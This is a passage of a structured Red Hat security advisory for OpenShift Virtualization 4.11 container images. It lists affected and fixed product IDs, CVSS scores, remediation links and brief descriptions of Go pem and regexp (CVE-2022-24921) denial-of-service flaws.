changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], threats: [ { category: "impact", details: "Moderate", }, ], title: "golang: encoding/pem: fix stack overflow in Decode", }, { cve: "CVE-2022-24921", cwe: { id: "CWE-400", name: "Uncontrolled Resource Consumption", }, discovery_date: "2022-03-16T00:00:00+00:00", flags: [ { label: "vulnerable_code_not_present", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, ], ids: [ { system_name: "Red Hat Bugzilla ID", text: "2064857", }, ], notes: [ { category: "description", text: "A stack overflow flaw was found in Golang's regexp module, which can crash the runtime if the application using regexp accepts very long or arbitrarily long regexps from untrusted sources that have sufficient nesting depths. To exploit this vulnerability, an attacker would need to send large regexps with deep nesting to the application. Triggering this flaw leads to a crash of the runtime, which causes a denial of service.", title: "Vulnerability description", }, { category: "summary", text: "golang: regexp: stack exhaustion via a deeply nested expression", title: "Vulnerability summary", }, { category: "other", text: "This flaw has been rated as a Moderate impact flaw because the exploitation of this flaw requires that an affected application accept arbitrarily long regexps from untrusted sources, which has inherent risks (even without this flaw), especially involving impacts to application availability.", title: "Statement", }, { category: "general", text: "The CVSS score(s) listed for this vulnerability do not reflect the associated product's status, and are included for informational purposes to better understand the severity of this vulnerability.", title: "CVSS score applicability", }, ], product_status: { fixed: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], known_not_affected: [ "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-cleanup-vm@sha256:b4151b401146f609a0647886845233d6bd1561aaaba72866fcad6d3f4539f950_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-copy-template@sha256:34e68039c045ac22068a557d548b420ab04cda5fa755404ee1c850aa6817747f_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-datavolume@sha256:56de4ec139a88c5f61a0cd87dc405e208992a9cf343cc6925094cbefb533f2ce_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-create-vm-from-template@sha256:7c16943b0da0e7c886c2cad5a87c92db111a96b842f66971862d2d81df0a92f2_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-customize@sha256:c0fd52ef347d2cd496a98ea67ed432074127cb6f86e64798f452968d26e39594_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-disk-virt-sysprep@sha256:da18128194e3574952655b623395d330fd82912fc598b0804762f039cd7bd713_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-modify-vm-template@sha256:4747611e2b2648b3d765e6c728d80d339a25dd20664ecc57b70a1e09d71eee64_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-operator@sha256:2c008c250adad10a90fad4a7be1825ba4d950a7fbf9134c7a08346c5e0483c26_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-tekton-tasks-wait-for-vmi-status@sha256:afe3a2b76c42e27399cb71fb3c02317e89cb5f3201f9f95ec0bfa9e74c4775c4_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-template-validator@sha256:b8122af35a7695f7cf99e4d36546920570e408cfba2b45c90ffd4dd2ddf47c77_amd64", "8Base-CNV-4.11:container-native-virtualization/libguestfs-tools@sha256:083c332bd90cb8fbb02182926985accff8ba9a4ca351a6a7c049cb173e2cea00_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-api@sha256:e47dc1188b335a23bbaf9aec8df03fd78dc4b62b3e41f06bc67a408363016e05_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-artifacts-server@sha256:412af0af13fb583eb59bf00c544b2feef9f02bfcec9776ccce1750d781a35341_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-controller@sha256:a07a7931e8778971d6e3a73fdd0cabb442e057505d6364d98adcfa2d088b4858_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-handler@sha256:81840626baefd6558db56a060ad37ecbd21378b3a96bfe525727f8ab64b02462_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-launcher@sha256:ca64a5d33cae1ddec96abde09f97ef0845a40bf2676a319dd3fb1f1737b1826d_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-operator@sha256:69c97e3d7f039edc5a8c7075dde0114ebdb56d62cf9e4d921b40ef3847f0c75c_amd64", "8Base-CNV-4.11:container-native-virtualization/virtio-win@sha256:3f4a86de5c9046c44a792a75fe056976dd6763afdba22a9aededa9ed2ab781d9_amd64", "8Base-CNV-4.11:container-native-virtualization/vm-network-latency-checkup@sha256:b7e272aa99af11856b4a2d6a7f1cea4258aef13e02e0b34c7e076b3798c8169d_amd64", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2022-24921", }, { category: "external", summary: "RHBZ#2064857", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2064857", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2022-24921", url: "https://www.cve.org/CVERecord?id=CVE-2022-24921", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2022-24921", url: "https://nvd.nist.gov/vuln/detail/CVE-2022-24921", }, { category: "external", summary: "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk", url: "https://groups.google.com/g/golang-announce/c/RP1hfrBYVuk", }, ], release_date: "2022-03-03T00:00:00+00:00", remediations: [ { category: "vendor_fix", date: "2022-09-14T19:28:51+00:00", details: "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-marker@sha256:612d67e74b6b682ea1d6358c7e766c2c499ac747ec6778a45f289ea597da736d_amd64", "8Base-CNV-4.11:container-native-virtualization/ovs-cni-plugin@sha256:3cffc89502ab45e9b47721cbca140d7946fd8afab6f1f9c6f17c17ea24374869_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-apiserver@sha256:6481694e07d022162c4512c3e346bd10718219c6ed78bed0bdbb759c9be3d434_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-cloner@sha256:578e2134d5a174249a374de5c26532db98fca13a571e81ac6839ba88beb19a01_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-controller@sha256:474a57191da17d55a2a4c85fc6babbf6a052a244cd6edaa8bb67cb3987be8e7c_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-importer@sha256:722bdbb1303c5c631dc574fd4d5873623f2b5cee18f14970ddd224a50c819b9f_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-operator@sha256:f2371c3df8800ed745ee00b2037c932e9889271d6b47f5fd4df72c0dd4559f70_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadproxy@sha256:69fbd2dee5cad3adfd2b85584e1c095a5896346497e0a58def70806f77687386_amd64", "8Base-CNV-4.11:container-native-virtualization/virt-cdi-uploadserver@sha256:056d9fa9dff8ba2eca829403a5d0190a3bf2767e6ab37e7b46b4cc1885e1e2df_amd64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2022:6526", }, ], scores: [ { cvss_v3: { attackComplexity: "LOW", attackVector: "NETWORK", availabilityImpact: "HIGH", baseScore: 7.5, baseSeverity: "HIGH", confidentialityImpact: "NONE", integrityImpact: "NONE", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "NONE", vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", version: "3.1", }, products: [ "8Base-CNV-4.11:container-native-virtualization/bridge-marker@sha256:faa1f729980217c7ffefa2134d5e8d851a6fb7913be7c6edf8ab7c3277b6f53d_amd64", "8Base-CNV-4.11:container-native-virtualization/checkup-framework@sha256:055aa6e280af9bfec4c8864f4d9ed79c22bd864829cff855650ef7fed092c815_amd64", "8Base-CNV-4.11:container-native-virtualization/cluster-network-addons-operator@sha256:c7475f5f5d2c24bffc410c39168d4eba8bffa64b7e220a51291ed4e6bf053c6f_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-containernetworking-plugins@sha256:af41f3c3f2b88a74bfe29c6001ca5e472bb9673150bfc0be35ffad66a012a573_amd64", "8Base-CNV-4.11:container-native-virtualization/cnv-must-gather-rhel8@sha256:3d364b59962f15123ba6ce8b2d49b1cd38b3f1d540b3b4c0a1858e93b6cba011_amd64", "8Base-CNV-4.11:container-native-virtualization/hco-bundle-registry@sha256:b83c2f51067335600cc20a39a9d911ad110d700ef46f53e7a18af4e534a77534_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver-rhel8@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-csi-driver@sha256:562548cfd4fd0327e3cd25365251eed5abe1aafbf394b0a112b79039c802c3c3_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8-operator@sha256:37cb86f8d15856f112cff0440638cd976572216a84afac2d11c8a2188f86be34_amd64", "8Base-CNV-4.11:container-native-virtualization/hostpath-provisioner-rhel8@sha256:ef1f3bfc036762d9060f490912fd1b43d9ce3b9c542a347b77f505ba92a51906_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-operator@sha256:9522cee60c82b120a4dd131f6dc690786740dd85ce5e7f83171823c4b7aa93e0_amd64", "8Base-CNV-4.11:container-native-virtualization/hyperconverged-cluster-webhook-rhel8@sha256:5a70d43a90d0860ca367c004fedc7a3b82132327a9d9e6bbb1d1244cd7fddb13_amd64", "8Base-CNV-4.11:container-native-virtualization/kubemacpool@sha256:9eb14ac44a379de4a6fe8583f582b2e39fd056beeab9951cd783e31340c0ce6a_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-console-plugin@sha256:884d54355a5e3f66f2916a4fd6bb182a2450f2c6a800176befc7a74b7b5cd5c9_amd64", "8Base-CNV-4.11:container-native-virtualization/kubevirt-ssp-operator@sha256:989137caa24e0604c230e84a7a65b7efc38ef68ef55ffe78353c51c58dd63e14_amd64", 